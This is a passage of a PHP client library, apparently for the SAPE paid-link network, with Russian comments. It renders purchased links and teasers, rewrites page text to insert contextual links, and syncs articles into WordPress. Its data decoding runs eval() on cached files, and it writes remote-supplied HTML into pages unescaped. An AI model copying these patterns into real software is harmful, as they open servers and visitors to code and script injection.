\$item; } // Вставной обязатльный элемент в блоке if (true == \$need_show_obligatory_block) { \$items .= str_replace('{item}', \$this->_block_ins_itemobligatory, \$item_container_tpl); \$nof_items_total += 1; } // Вставные опциональные элементы в блоке if (\$need_show_conditional_block == true && \$nof_conditional > 0) { for (\$i = 0; \$i < \$nof_conditional; \$i++) { \$items .= str_replace('{item}', \$this->_block_ins_itemconditional, \$item_container_tpl); } \$nof_items_total += \$nof_conditional; } if (\$items != '') { \$html .= str_replace('{items}', \$items, \$block_tpl); // Проставляем ширину, чтобы везде одинковая была if (\$nof_items_total > 0) { \$html = str_replace('{td_width}', round(100 / \$nof_items_total), \$html); } else { \$html = str_replace('{td_width}', 0, \$html); } // Если задано, то переопределить ширину блока if (isset(\$options['block_width']) && !empty(\$options['block_width'])) { \$html = str_replace('{block_style_custom}', 'style="width: ' . \$options['block_width'] . '!important;"', \$html); } } unset(\$block_tpl_parts, \$block_tpl, \$items, \$item, \$item_tpl, \$item_container_tpl); // Вставной блок в конце блока if (isset(\$this->_block_ins_afterblock)) { \$html .= \$this->_block_ins_afterblock; } //Заполняем оставшиеся модификаторы значениями unset(\$options['block_no_css'], \$options['block_orientation'], \$options['block_width']); \$tpl_modifiers = array_keys(\$options); foreach (\$tpl_modifiers as \$k => \$m) { \$tpl_modifiers[\$k] = '{' . \$m . '}'; } unset(\$m, \$k); \$tpl_modifiers_values = array_values(\$options); \$html = str_replace(\$tpl_modifiers, \$tpl_modifiers_values, \$html); unset(\$tpl_modifiers, \$tpl_modifiers_values); //Очищаем незаполненные модификаторы \$clear_modifiers_regexp = '#\{[a-z\d_\-]+\}#'; \$html = preg_replace(\$clear_modifiers_regexp, ' ', \$html); \$return_links_options = array( 'is_block_links' => true, 'nof_links_requested' => \$n_requested, 'nof_links_displayed' => \$n, 'nof_obligatory' => (\$need_show_obligatory_block == true ? 1 : 0), 'nof_conditional' => \$nof_conditional ); \$html = \$this->_return_array_links_html(\$html, \$return_links_options); return \$this->_return_html(\$html); } /** * Вывод ссылок в обычном виде - текст с разделителем * * - Примечание: начиная с версии 1.2.2 второй аргумент \$offset убран. Если * передавать его согласно старой сигнатуре, то он будет проигнорирован. * * @param int \$n Количество ссылок, которые нужно вывести * @param array \$options Опции * * <code> * \$options = array(); * \$options['as_block'] = (false|true); * // Показывать ли ссылки в виде блока * </code> * * @see return_block_links() * @see return_counter() * * @return string */ public function return_links(\$n = null, \$options = null) { if (\$this->_debug) { if (function_exists('debug_backtrace')) { \$this->_return_links_calls[] = debug_backtrace(); } else { \$this->_return_links_calls = "(function_exists('debug_backtrace')==false"; } } \$numargs = func_num_args(); \$args = func_get_args(); //Проверяем аргументы для старой сигнатуры вызова if (2 == \$numargs) { // return_links(\$n, \$options) if (!is_array(\$args[1])) { // return_links(\$n, \$offset) - deprecated! \$options = null; } } elseif (2 < \$numargs) { // return_links(\$n, \$offset, \$options) - deprecated! if (!is_array(\$options)) { \$options = \$args[2]; } } //Опрелелить, как выводить ссылки \$as_block = \$this->_show_only_block; if (is_array(\$options) && isset(\$options['as_block']) && false == \$as_block) { \$as_block = \$options['as_block']; } if (true == \$as_block && isset(\$this->_block_tpl)) { return \$this->return_block_links(\$n, \$options); } //------- if (is_array(\$this->_links_page)) { \$total_page_links = count(\$this->_links_page); if (!is_numeric(\$n) || \$n > \$total_page_links) { \$n = \$total_page_links; } \$links = array(); for (\$i = 1; \$i <= \$n; \$i++) { \$links[] = array_shift(\$this->_links_page); } \$html = \$this->_convertCharset(join(\$this->_links_delimiter, \$links)); if (\$this->_is_our_bot) { \$html = '<sape_noindex>' . \$html . '</sape_noindex>'; } } else { \$html = \$this->_links_page; if (\$this->_is_our_bot) { \$html .= '<sape_noindex></sape_noindex>'; } } \$html = \$this->_return_html(\$html); return \$html; } public function return_teasers_block(\$block_id) { if (\$this->_debug) { if (function_exists('debug_backtrace')) { \$this->_return_links_calls[] = debug_backtrace(); } else { \$this->_return_links_calls = "(function_exists('debug_backtrace')==false"; } } \$html = ''; \$template = @\$this->_links['__sape_teasers_templates__'][\$block_id]; if (count(\$this->_teasers_page) && false == empty(\$template)) { if (count(\$this->_teasers_page) < \$template['n']) { \$teasers = \$this->_teasers_page; \$to_add = \$template['n'] - count(\$this->_teasers_page); \$this->_teasers_page = array(); } else { \$teasers = array_slice(\$this->_teasers_page, 0, \$template['n']); \$to_add = 0; \$this->_teasers_page = array_slice(\$this->_teasers_page, \$template['n']); } foreach (\$teasers as \$k => \$v) { preg_match('#href="(https?://([^"/]+)[^"]*)"#i', \$v, \$url); \$url = empty(\$url[1]) ? '' : \$url[1]; \$teasers[\$k] = str_replace('{u}', \$url, \$template['bi'] . \$v . \$template['ai']); } if (\$to_add) { \$teasers = array_merge(\$teasers, array_fill(\$template['n'], \$to_add, \$template['e'])); } \$html = \$this->_convertCharset( (\$this->_teasers_css_showed ? '' : \$this->_links['__sape_teasers_css__']) . str_replace('{i}', implode(\$template['d'], \$teasers), \$template['t']) ); \$this->_teasers_css_showed = true; } else { if (\$this->_is_our_bot || \$this->_force_show_code) { \$html = \$this->_links['__sape_new_teasers_block__'] . '<!-- ' . \$block_id . ' -->'; } if (!empty(\$template)) { \$html .= str_replace('{id}', \$block_id, \$template['f']); } else { \$this->_raise_error("Нет информации по блоку \$block_id, обратитесь в службу поддержки"); } } if (\$this->_is_our_bot) { \$html = '<sape_noindex>' . \$html . '</sape_noindex>'; } return \$this->_add_debug_info(\$this->_return_obligatory_page_content() . \$html); } public function show_image(\$file_name = null) { if (\$this->_debug) { if (function_exists('debug_backtrace')) { \$this->_return_links_calls[] = debug_backtrace(); } else { \$this->_return_links_calls = "(function_exists('debug_backtrace')==false"; } echo \$this->_add_debug_info(''); } \$file_name = \$file_name ? \$file_name : parse_url(\$this->_request_uri, PHP_URL_QUERY); if (!array_key_exists('__sape_teaser_images__', \$this->_links) || !array_key_exists(\$file_name, \$this->_links['__sape_teaser_images__'])) { \$this->_raise_error("Нет файла изображения с именем '\$file_name'"); header("HTTP/1.0 404 Not Found"); } else { \$extension = pathinfo(strtolower(\$file_name), PATHINFO_EXTENSION); if (\$extension == 'jpg') { \$extension = 'jpeg'; } header('Content-Type: image/' . \$extension); header('Content-Length: ' . strlen(\$this->_links['__sape_teaser_images__'][\$file_name])); header('Cache-control: public, max-age=604800'); //1 week echo \$this->_links['__sape_teaser_images__'][\$file_name]; } } protected function _get_db_file() { if (\$this->_multi_site) { return dirname(__FILE__) . '/' . \$this->_host . '.links' . \$this->_get_save_filename_prefix() . '.db'; } else { return dirname(__FILE__) . '/links' . \$this->_get_save_filename_prefix() . '.db'; } } protected function _get_meta_file() { if (\$this->_multi_site) { return dirname(__FILE__) . '/' . \$this->_host . '.links.meta.db'; } else { return dirname(__FILE__) . '/links.meta.db'; } } protected function _get_dispenser_path() { return '/code.php?user=' . _SAPE_USER . '&host=' . \$this->_host; } protected function _set_data(\$data) { if (\$this->_ignore_case) { \$this->_links = array_change_key_case(\$data); } else { \$this->_links = \$data; } if (isset(\$this->_links['__sape_delimiter__'])) { \$this->_links_delimiter = \$this->_links['__sape_delimiter__']; } // определяем кодировку кеша if (isset(\$this->_links['__sape_charset__'])) { \$this->_sape_charset = \$this->_links['__sape_charset__']; } else { \$this->_sape_charset = ''; } if (@array_key_exists(\$this->_request_uri, \$this->_links) && is_array(\$this->_links[\$this->_request_uri])) { \$this->_links_page = \$this->_links[\$this->_request_uri]; } else { if (isset(\$this->_links['__sape_new_url__']) && strlen(\$this->_links['__sape_new_url__'])) { if (\$this->_is_our_bot || \$this->_force_show_code) { \$this->_links_page = \$this->_links['__sape_new_url__']; } } } if (@array_key_exists(\$this->_request_uri, \$this->_links['__sape_teasers__']) && is_array(\$this->_links['__sape_teasers__'][\$this->_request_uri])) { \$this->_teasers_page = \$this->_links['__sape_teasers__'][\$this->_request_uri]; } //Есть ли обязательный вывод if (isset(\$this->_links['__sape_page_obligatory_output__'])) { if (\$this->_teasers_rtb_proxy !== null) { \$this->_page_obligatory_output = \$this->_teasers_rtb_proxy->return_script(); } else { \$this->_page_obligatory_output = \$this->_links['__sape_page_obligatory_output__']; } } // Есть ли флаг блочных ссылок if (isset(\$this->_links['__sape_show_only_block__'])) { \$this->_show_only_block = \$this->_links['__sape_show_only_block__']; } else { \$this->_show_only_block = false; } // Есть ли шаблон для красивых ссылок if (isset(\$this->_links['__sape_block_tpl__']) && !empty(\$this->_links['__sape_block_tpl__']) && is_array(\$this->_links['__sape_block_tpl__']) ) { \$this->_block_tpl = \$this->_links['__sape_block_tpl__']; } // Есть ли параметры для красивых ссылок if (isset(\$this->_links['__sape_block_tpl_options__']) && !empty(\$this->_links['__sape_block_tpl_options__']) && is_array(\$this->_links['__sape_block_tpl_options__']) ) { \$this->_block_tpl_options = \$this->_links['__sape_block_tpl_options__']; } // IDNA-домены if (isset(\$this->_links['__sape_block_uri_idna__']) && !empty(\$this->_links['__sape_block_uri_idna__']) && is_array(\$this->_links['__sape_block_uri_idna__']) ) { \$this->_block_uri_idna = \$this->_links['__sape_block_uri_idna__']; } // Блоки \$check_blocks = array( 'beforeall', 'beforeblock', 'afterblock', 'itemobligatory', 'itemconditional', 'afterall' ); foreach (\$check_blocks as \$block_name) { \$var_name = '__sape_block_ins_' . \$block_name . '__'; \$prop_name = '_block_ins_' . \$block_name; if (isset(\$this->_links[\$var_name]) && strlen(\$this->_links[\$var_name]) > 0) { \$this->\$prop_name = \$this->_links[\$var_name]; } } } protected function _uncode_data(\$data) { if (\$this->_format == 'php-require') { \$data1 = str_replace('<?php return ', '', \$data); eval('\$data = ' . \$data1 . ';'); return \$data; } return @unserialize(\$data); } protected function _code_data(\$data) { if (\$this->_format == 'php-require') { return var_export(\$data, true); } return @serialize(\$data); } protected function _save_data(\$data, \$filename = '') { if (\$this->_split_data_file) { \$directory = dirname(__FILE__) . '/'; \$hashArray = array(); \$data = \$this->_uncode_data(\$data); foreach (\$data as \$url => \$item) { if (preg_match('/\_\_.+\_\_/mu', \$url)) { \$currentFile = 'links.meta.db'; } else { \$currentFile = 'links.' . crc32(\$url) % 100 . '.db'; } if (\$this->_multi_site) { \$currentFile = \$this->_host . '.' . \$currentFile; } \$hashArray[\$currentFile][\$url] = \$item; } foreach (\$hashArray as \$file => \$array) { \$this->_write(\$directory . \$file, \$this->_code_data(\$array)); } if (!isset(\$hashArray[basename(\$filename)])) { parent::_save_data('', \$filename); } } else { parent::_save_data(\$data, \$filename); } } } /** * Класс для работы с контекстными ссылками */ class SAPE_context extends SAPE_base { protected \$_words = array(); protected \$_words_page = array(); protected \$_user_agent = 'SAPE_Context PHP'; protected \$_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button'); protected \$_debug_actions = array(); public function __construct(\$options = null) { parent::__construct(\$options); \$this->_load_data(); } /** * Начать сбор дебаг-информации */ protected function _debug_action_start() { if (!\$this->_debug) { return; } \$this->_debug_actions = array(); \$this->_debug_actions[] = \$this->_get_full_user_agent_string(); } /** * Записать строку дебаг-информацию * * @param \$data * @param string \$key */ protected function _debug_action_append(\$data, \$key = '') { if (!\$this->_debug) { return; } if (!empty(\$key)) { \$this->_debug_actions[] = array(\$key => \$data); } else { \$this->_debug_actions[] = \$data; } } /** * Вывод дебаг-информации * * @return string */ protected function _debug_action_output() { if (!\$this->_debug || empty(\$this->_debug_actions)) { return ''; } \$debug_info = \$this->_debug_output(\$this->_debug_actions); \$this->_debug_actions = array(); return \$debug_info; } /** * Замена слов в куске текста и обрамляет его тегами sape_index */ public function replace_in_text_segment(\$text) { \$this->_debug_action_start(); \$this->_debug_action_append('START: replace_in_text_segment()'); \$this->_debug_action_append(\$text, 'argument for replace_in_text_segment'); if (count(\$this->_words_page) > 0) { \$source_sentences = array(); //Создаем массив исходных текстов для замены foreach (\$this->_words_page as \$n => \$sentence) { //Заменяем все сущности на символы \$special_chars = array( '&' => '&', '"' => '"', ''' => '\'', '<' => '<', '>' => '>' ); \$sentence = strip_tags(\$sentence); \$sentence = strip_tags(\$sentence); \$sentence = str_replace(array_keys(\$special_chars), array_values(\$special_chars), \$sentence); //Преобразуем все спец символы в сущности \$htsc_charset = empty(\$this->_charset) ? 'windows-1251' : \$this->_charset; \$quote_style = ENT_COMPAT; if (version_compare(PHP_VERSION, '5.4.0') >= 0) { \$quote_style = ENT_COMPAT | ENT_HTML401; } \$sentence = htmlspecialchars(\$sentence, \$quote_style, \$htsc_charset); //Квотируем \$sentence = preg_quote(\$sentence, '/'); \$replace_array = array(); if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', \$sentence, \$out)) { for (\$i = 0; \$i < count(\$out[1]); \$i++) { \$unspec = \$special_chars[\$out[1][\$i]]; \$real = \$out[1][\$i]; \$replace_array[\$unspec] = \$real; } } //Заменяем сущности на ИЛИ (сущность|символ) foreach (\$replace_array as \$unspec => \$real) { \$sentence = str_replace(\$real, '((' . \$real . ')|(' . \$unspec . '))', \$sentence); } //Заменяем пробелы на переносы или сущности пробелов \$source_sentences[\$n] = str_replace(' ', '((\s)|( ))+', \$sentence); } \$this->_debug_action_append(\$source_sentences, 'sentences for replace'); //если это первый кусок, то не будем добавлять < \$first_part = true; //пустая переменная для записи if (count(\$source_sentences) > 0) { \$content = ''; \$open_tags = array(); //Открытые забаненые тэги \$close_tag = ''; //Название текущего закрывающего тэга //Разбиваем по символу начала тега \$part = strtok(' ' . \$text, '<'); while (\$part !== false) { //Определяем название тэга if (preg_match('/(?si)^(\/?[a-z0-9]+)/', \$part, \$matches)) { //Определяем название тега \$tag_name = strtolower(\$matches[1]); //Определяем закрывающий ли тэг if (substr(\$tag_name, 0, 1) == '/') { \$close_tag = substr(\$tag_name, 1); \$this->_debug_action_append(\$close_tag, 'close tag'); } else { \$close_tag = ''; \$this->_debug_action_append(\$tag_name, 'open tag'); } \$cnt_tags = count(\$open_tags); //Если закрывающий тег совпадает с тегом в стеке открытых запрещенных тегов if ((\$cnt_tags > 0) && (\$open_tags[\$cnt_tags - 1] == \$close_tag)) { array_pop(\$open_tags); \$this->_debug_action_append(\$tag_name, 'deleted from open_tags'); if (\$cnt_tags - 1 == 0) { \$this->_debug_action_append('start replacement'); } } //Если нет открытых плохих тегов, то обрабатываем if (count(\$open_tags) == 0) { //если не запрещенный тэг, то начинаем обработку if (!in_array(\$tag_name, \$this->_filter_tags)) { \$split_parts = explode('>', \$part, 2); //Перестраховываемся if (count(\$split_parts) == 2) { //Начинаем перебор фраз для замены foreach (\$source_sentences as \$n => \$sentence) { if (preg_match('/' . \$sentence . '/', \$split_parts[1]) == 1) { \$split_parts[1] = preg_replace('/' . \$sentence . '/', str_replace('\$', '\\$', \$this->_words_page[\$n]), \$split_parts[1], 1); \$this->_debug_action_append(\$sentence . ' --- ' . \$this->_words_page[\$n], 'replaced'); //Если заменили, то удаляем строчку из списка замены unset(\$source_sentences[\$n]); unset(\$this->_words_page[\$n]); } } \$part = \$split_parts[0] . '>' . \$split_parts[1]; unset(\$split_parts); } } else { //Если у нас запрещеный тэг, то помещаем его в стек открытых \$open_tags[] = \$tag_name; \$this->_debug_action_append(\$tag_name, 'added to open_tags, stop replacement'); } } } elseif (count(\$open_tags) == 0) { //Если нет названия тега, то считаем, что перед нами текст foreach (\$source_sentences as \$n => \$sentence) { if (preg_match('/' . \$sentence . '/', \$part) == 1) { \$part = preg_replace('/' . \$sentence . '/', str_replace('\$', '\\$', \$this->_words_page[\$n]), \$part, 1); \$this->_debug_action_append(\$sentence . ' --- ' . \$this->_words_page[\$n], 'replaced'); //Если заменили, то удаляем строчку из списка замены, //чтобы было можно делать множественный вызов unset(\$source_sentences[\$n]); unset(\$this->_words_page[\$n]); } } } //Если это первая часть, то не выводим < if (\$first_part) { \$content .= \$part; \$first_part = false; } else { \$content .= '<' . \$part; } //Получаем следующу часть unset(\$part); \$part = strtok('<'); } \$text = ltrim(\$content); unset(\$content); } } else { \$this->_debug_action_append('No word\'s for page'); } if (\$this->_is_our_bot || \$this->_force_show_code || \$this->_debug) { \$text = '<sape_index>' . \$text . '</sape_index>'; if (isset(\$this->_words['__sape_new_url__']) && strlen(\$this->_words['__sape_new_url__'])) { \$text .= \$this->_words['__sape_new_url__']; } } if (count(\$this->_words_page) > 0) { \$this->_debug_action_append(\$this->_words_page, 'Not replaced'); } \$this->_debug_action_append('END: replace_in_text_segment()'); \$text .= \$this->_debug_action_output(); return \$text; } /** * Замена слов */ public function replace_in_page(\$buffer) { \$this->_debug_action_start(); \$this->_debug_action_append('START: replace_in_page()'); \$s_globals = new SAPE_globals(); if (!\$s_globals->page_obligatory_output_shown() && isset(\$this->_page_obligatory_output) && !empty(\$this->_page_obligatory_output) ) { \$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', \$buffer, -1, PREG_SPLIT_DELIM_CAPTURE); if (count(\$split_content) == 5) { \$buffer = \$split_content[0] . \$split_content[1] . \$split_content[2] . (false == \$this->_show_counter_separately ? \$this->_return_obligatory_page_content() : '') . \$split_content[3] . \$split_content[4]; unset(\$split_content); \$s_globals->page_obligatory_output_shown(true); } } if (count(\$this->_words_page) > 0) { //разбиваем строку по sape_index //Проверяем есть ли теги sape_index \$split_content = preg_split('/(?smi)(<\/?sape_index>)/', \$buffer, -1); \$cnt_parts = count(\$split_content); if (\$cnt_parts > 1) { //Если есть хоть одна пара sape_index, то начинаем работу if (\$cnt_parts >= 3) { for (\$i = 1; \$i < \$cnt_parts; \$i = \$i + 2) { \$split_content[\$i] = \$this->replace_in_text_segment(\$split_content[\$i]); } } \$buffer = implode('', \$split_content); \$this->_debug_action_append(\$cnt_parts, 'Split by Sape_index cnt_parts='); } else { //Если не нашли sape_index, то пробуем разбить по BODY \$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', \$buffer, -1, PREG_SPLIT_DELIM_CAPTURE); //Если нашли содержимое между body if (count(\$split_content) == 5) { \$split_content[0] = \$split_content[0] . \$split_content[1]; \$split_content[1] = \$this->replace_in_text_segment(\$split_content[2]); \$split_content[2] = \$split_content[3] . \$split_content[4]; unset(\$split_content[3]); unset(\$split_content[4]); \$buffer = \$split_content[0] . \$split_content[1] . \$split_content[2]; \$this->_debug_action_append('Split by BODY'); } else { //Если не нашли sape_index и не смогли разбить по body \$this->_debug_action_append('Cannot split by BODY'); } } } else { if (!\$this->_is_our_bot && !\$this->_force_show_code && !\$this->_debug) { \$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', \$buffer); } else { if (isset(\$this->_words['__sape_new_url__']) && strlen(\$this->_words['__sape_new_url__'])) { \$buffer .= \$this->_words['__sape_new_url__']; } } \$this->_debug_action_append('No word\'s for page'); } \$this->_debug_action_append('STOP: replace_in_page()'); \$buffer .= \$this->_debug_action_output(); return \$buffer; } protected function _get_db_file() { if (\$this->_multi_site) { return dirname(__FILE__) . '/' . \$this->_host . '.words' . \$this->_get_save_filename_prefix() . '.db'; } else { return dirname(__FILE__) . '/words' . \$this->_get_save_filename_prefix() . '.db'; } } protected function _get_meta_file() { if (\$this->_multi_site) { return dirname(__FILE__) . '/' . \$this->_host . '.words.meta.db'; } else { return dirname(__FILE__) . '/words.meta.db'; } } protected function _get_dispenser_path() { return '/code_context.php?user=' . _SAPE_USER . '&host=' . \$this->_host; } protected function _set_data(\$data) { \$this->_words = \$data; if (@array_key_exists(\$this->_request_uri, \$this->_words) && is_array(\$this->_words[\$this->_request_uri])) { \$this->_words_page = \$this->_words[\$this->_request_uri]; } //Есть ли обязательный вывод if (isset(\$this->_words['__sape_page_obligatory_output__'])) { \$this->_page_obligatory_output = \$this->_words['__sape_page_obligatory_output__']; } } protected function _uncode_data(\$data) { if (\$this->_format == 'php-require') { \$data1 = str_replace('<?php return ', '', \$data); eval('\$data = ' . \$data1 . ';'); return \$data; } return @unserialize(\$data); } protected function _code_data(\$data) { if (\$this->_format == 'php-require') { return var_export(\$data, true); } return @serialize(\$data); } protected function _save_data(\$data, \$filename = '') { if (\$this->_split_data_file) { \$directory = dirname(__FILE__) . '/'; \$hashArray = array(); \$data = \$this->_uncode_data(\$data); foreach (\$data as \$url => \$item) { if (preg_match('/\_\_.+\_\_/mu', \$url)) { \$currentFile = 'words.meta.db'; } else { \$currentFile = 'words.' . crc32(\$url) % 100 . '.db'; } if (\$this->_multi_site) { \$currentFile = \$this->_host . '.' . \$currentFile; } \$hashArray[\$currentFile][\$url] = \$item; } foreach (\$hashArray as \$file => \$array) { \$this->_write(\$directory . \$file, \$this->_code_data(\$array)); } if (!isset(\$hashArray[basename(\$filename)])) { parent::_save_data('', \$filename); } } else { parent::_save_data(\$data, \$filename); } } } /** * Класс для работы со статьями articles.sape.ru показывает анонсы и статьи */ class SAPE_articles extends SAPE_base { const INTEGRATION_TYPE_WORDPRESS = 2; protected \$_request_mode; protected \$_server_list = array('dispenser.articles.sape.ru'); protected \$_data = array(); protected \$_article_id; protected \$_save_file_name; protected \$_announcements_delimiter = ''; protected \$_images_path; protected \$_template_error = false; protected \$_noindex_code = '<!--sape_noindex-->'; protected \$_headers_enabled = false; protected \$_mask_code; protected \$_real_host; protected \$_user_agent = 'SAPE_Articles_Client PHP'; public function __construct(\$options = null) { parent::__construct(\$options); if (is_array(\$options) && isset(\$options['headers_enabled'])) { \$this->_headers_enabled = \$options['headers_enabled']; } // Кодировка if (isset(\$options['charset']) && strlen(\$options['charset'])) { \$this->_charset = \$options['charset']; } else { \$this->_charset = ''; } \$this->_get_index(); if (!empty(\$this->_data['index']['announcements_delimiter'])) { \$this->_announcements_delimiter = \$this->_data['index']['announcements_delimiter']; } if (!empty(\$this->_data['index']['charset']) and !(isset(\$options['charset']) && strlen(\$options['charset'])) ) { \$this->_charset = \$this->_data['index']['charset']; } if (is_array(\$options)) { if (isset(\$options['host'])) { \$host = \$options['host']; } } elseif (strlen(\$options)) { \$host = \$options; \$options = array(); } if (isset(\$host) && strlen(\$host)) { \$this->_real_host = \$host; } else { \$this->_real_host = \$_SERVER['HTTP_HOST']; } if (!isset(\$this->_data['index']['announcements'][\$this->_request_uri])) { \$this->_correct_uri(); } \$this->_split_data_file = false; } protected function _correct_uri() { if (substr(\$this->_request_uri, -1) == '/') { \$new_uri = substr(\$this->_request_uri, 0, -1); } else { \$new_uri = \$this->_request_uri . '/'; } if (isset(\$this->_data['index']['announcements'][\$new_uri])) { \$this->_request_uri = \$new_uri; } } /** * Возвращает анонсы для вывода * * @param int \$n Сколько анонсов вывести, либо не задано - вывести все * @param int \$offset C какого анонса начинаем вывод(нумерация с 0), либо не задано - с нулевого * * @return string */ public function return_announcements(\$n = null, \$offset = 0) { \$output = ''; if (\$this->_force_show_code || \$this->_is_our_bot) { if (isset(\$this->_data['index']['checkCode'])) { \$output .= \$this->_data['index']['checkCode']; } } if (false == \$this->_show_counter_separately) { \$output .= \$this->_return_obligatory_page_content(); } if (isset(\$this->_data['index']['announcements'][\$this->_request_uri])) { \$total_page_links = count(\$this->_data['index']['announcements'][\$this->_request_uri]); if (!is_numeric(\$n) || \$n > \$total_page_links) { \$n = \$total_page_links; } \$links = array(); for (\$i = 1; \$i <= \$n; \$i++) { if (\$offset > 0 && \$i <= \$offset) { array_shift(\$this->_data['index']['announcements'][\$this->_request_uri]); } else { \$links[] = array_shift(\$this->_data['index']['announcements'][\$this->_request_uri]); } } \$html = join(\$this->_announcements_delimiter, \$links); if (\$this->_is_our_bot) { \$html = '<sape_noindex>' . \$html . '</sape_noindex>'; } \$output .= \$html; } return \$output; } /** * Основной метод при работе в режиме интеграции с CMS Wordpress * * @param \$newArticles * @param \$updateArticles * @param \$deletedArticles * @param \$upload_base_dir */ public function wp_process(&\$newArticles, &\$updateArticles, &\$deletedArticles, \$upload_base_dir) { // Инициализация файла работы с WordPress \$this->_wp_init(); if ((int)\$this->_data['index']['integration_type'] == self::INTEGRATION_TYPE_WORDPRESS) { // Список статей на диспенсере \$dispenserArticles = array(); if (isset(\$this->_data['index']['articles'])) { foreach (\$this->_data['index']['articles'] as \$article) { \$dispenserArticles[(int)\$article['id']] = array( 'id' => (int)\$article['id'], 'date_updated' => (int)\$article['date_updated'] ); } } // Список статей из WordPress-а \$wpArticles = \$this->_data['wp']; \$dispenserArticleIds = array_keys(\$dispenserArticles); \$wpArticleIds = array_keys(\$wpArticles); \$unionArticlesIds = array_merge(\$dispenserArticleIds, \$wpArticleIds); foreach (\$unionArticlesIds as \$articleId) { // Новые статьи if (in_array(\$articleId, \$dispenserArticleIds) && !in_array(\$articleId, \$wpArticleIds)) { \$this->_load_wp_article(\$dispenserArticles[\$articleId]); \$newArticles[\$articleId] = array( 'id' => (int)\$articleId, 'title' => \$this->_data['article']['title'], 'keywords' => \$this->_data['article']['keywords'], 'description' => \$this->_data['article']['description'], 'body' => \$this->_data['article']['body'], ); } // Существующие статьи if (in_array(\$articleId, \$dispenserArticleIds) && in_array(\$articleId, \$wpArticleIds)) { \$this->_load_wp_article(\$dispenserArticles[\$articleId]); if ( \$this->_data['article']['title'] != \$this->_data['wp'][\$articleId]['wp_post_title'] || \$this->_data['article']['body'] != \$this->_data['wp'][\$articleId]['wp_post_content'] ) { \$updateArticles[\$articleId] = array( 'id' => (int)\$articleId, 'wp_post_id' => \$this->_data['wp'][\$articleId]['wp_post_id'], 'title' => \$this->_data['article']['title'], 'keywords' => \$this->_data['article']['keywords'], 'description' => \$this->_data['article']['description'], 'body' => \$this->_data['article']['body'], ); } } // Снятые статьи if (!in_array(\$articleId, \$dispenserArticleIds) && in_array(\$articleId, \$wpArticleIds)) { \$deletedArticles[\$articleId] = array( 'id' => (int)\$articleId, 'wp_post_id' => (int)\$wpArticles[\$articleId]['wp_post_id'] ); } } // Работа с изображениями if (isset(\$this->_data['index']['images'])) { foreach (\$this->_data['index']['images'] as \$image_uri => \$image_meta) { \$this->_load_wp_image(\$image_uri, \$image_meta['article_id'], \$upload_base_dir); } } } } /** * Массив идентификаторов постов движка Wordpress, * которые были созданы в режиме интеграции * * @return array */ public function wp_get_post_ids() { \$wpPostIds = array(); // Инициализация файла работы с WordPress \$this->_wp_init(); // Список статей из WordPress-а \$wpArticles = \$this->_data['wp']; foreach (\$wpArticles as \$wpArticle) { \$wpPostIds[] = (int)\$wpArticle['wp_post_id']; } return \$wpPostIds; } /** * Сохранение информации о постах движка Wordpress, * которые были созданы в режиме интеграции * * @param \$posts * @param string \$mode */ public function wp_save_local_db(\$posts, \$mode = 'add') { if (isset(\$posts) && is_array(\$posts)) { \$this->_save_file_name = 'articles.wp.db'; \$this->_db_file = dirname(__FILE__) . '/' . \$this->_host . '.' . \$this->_save_file_name; foreach (\$posts as \$articleId => \$post) { if (in_array(\$mode, array('add', 'update'))) { \$this->_data['wp'][\$articleId] = \$post; } if (\$mode == 'delete') { unset(\$this->_data['wp'][\$articleId]); } } \$this->_save_data(serialize(\$this->_data['wp']), \$this->_db_file); } } /** * Передача диспенсеру УРЛов размещенных статей, * созданных в режиме интеграции * * @param \$posts * @param \$upload_base_url */ public function wp_push_posts(\$posts, \$upload_base_url) { \$this->_set_request_mode('article'); if (isset(\$posts) && is_array(\$posts)) { foreach (\$posts as \$articleId => \$post) { \$this->_article_id = (int)\$articleId; \$path = \$this->_get_dispenser_path(); \$path_postfix = '&set_article_url=' . urlencode(\$post['wp_post_url']); \$path_postfix .= '&set_article_image_url=' . urlencode(\$upload_base_url . '/' . (int)\$articleId . '/'); foreach (\$this->_server_list as \$server) { if (\$data = \$this->_fetch_remote_file(\$server, \$path . \$path_postfix)) { if (substr(\$data, 0, 12) != 'FATAL ERROR:') { break; } \$this->_raise_error(\$data); } } } // Обновляем индекс \$this->_save_file_name = 'articles.db'; unlink(\$this->_get_db_file()); \$this->_get_index(); } } /** * Инициализация режима интеграции с CMS Wordpress */ protected function _wp_init() { \$this->_set_request_mode('wp'); \$this->_save_file_name = 'articles.wp.db'; \$this->_load_wp_data(); } protected function _get_index() { \$this->_set_request_mode('index'); \$this->_save_file_name = 'articles.db'; \$this->_load_data(); } /** * Возвращает полный HTML код страницы статьи * @return string */ public function process_request() { if (!empty(\$this->_data['index']) and isset(\$this->_data['index']['articles'][\$this->_request_uri])) { return \$this->_return_article(); } elseif (!empty(\$this->_data['index']) and isset(\$this->_data['index']['images'][\$this->_request_uri])) { return \$this->_return_image(); } else { if (\$this->_is_our_bot) { return \$this->_return_html(\$this->_data['index']['checkCode'] . \$this->_noindex_code); } else { return \$this->_return_not_found(); } } } protected function _return_article() { \$this->_set_request_mode('article'); //Загружаем статью \$article_meta = \$this->_data['index']['articles'][\$this->_request_uri]; \$this->_save_file_name = \$article_meta['id'] . '.article.db'; \$this->_article_id = \$article_meta['id']; \$this->_load_data(); if (false == \$this->_show_counter_separately) { \$this->_data[\$this->_request_mode]['body'] = \$this->_return_obligatory_page_content() . \$this->_data[\$this->_request_mode]['body']; } //Обновим если устарела if (!isset(\$this->_data['article']['date_updated']) OR \$this->_data['article']['date_updated'] < \$article_meta['date_updated']) { unlink(\$this->_get_db_file()); \$this->_load_data(); } //Получим шаблон \$template = \$this->_get_template(\$this->_data['index']['templates'][\$article_meta['template_id']]['url'], \$article_meta['template_id']); //Выведем статью \$article_html = \$this->_fetch_article(\$template); if (\$this->_is_our_bot) { \$article_html .= \$this->_noindex_code; } return \$this->_return_html(\$article_html); } /** * Загрузка статьи в режиме интеграции CMS Wordpress * * @param \$article_meta */ protected function _load_wp_article(\$article_meta) { \$this->_set_request_mode('article'); //Загружаем статью \$this->_save_file_name = (int)\$article_meta['id'] . '.article.db'; \$this->_article_id = (int)\$article_meta['id']; \$this->_load_data(); if (false == \$this->_show_counter_separately) { \$this->_data[\$this->_request_mode]['body'] = \$this->_return_obligatory_page_content() . \$this->_data[\$this->_request_mode]['body']; } //Обновим если 